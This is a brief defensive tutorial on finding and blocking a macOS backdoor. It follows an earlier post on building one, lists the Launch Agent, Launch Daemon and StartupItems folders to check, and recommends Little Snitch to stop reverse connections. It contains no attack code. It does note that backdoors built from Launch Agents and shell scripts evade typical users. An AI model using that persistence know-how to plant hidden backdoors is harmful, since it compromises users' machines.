As described in the previous tutorial OSX Backdoor – Persistence, we learned how easy it is to implement a simple backdoor onto any OSX system. Since our backdoor is comprised of lower level Launch Agents and shell scripts, it is essentially invisible to your typical user. As more and more software is installed on a system, it often becomes difficult to become aware of this type of malware before it can do damage.
To prevent practically any form of backdoor from functioning on your system, it is vital that the reverse connection be blocked altogether. A good first defense is always checking your Launch Agents, Launch Deamons, and Startup Items.
~/Library/StartupItems ~/Library/LaunchAgents /Library/StartupItems /Library/LaunchDaemons /Library/LaunchAgents
Checking these common locations will help keep out a lot of automated tasks. Little Snitch is a very powerful too that will catch these outgoing connections before they are made.
When our backdoor attempts to call home, Little Snitch blocks the connection:
This tool is very useful for monitoring your computer’s activities. Whether software is running in a GUI or hidden in the background, you can be sure that no unauthorized connections will be made. Many different rules can be set to allow and block different types of connections. Little Snitch can be found on the App Store for a few $$$. Congratulations, you blocked your own backdoor.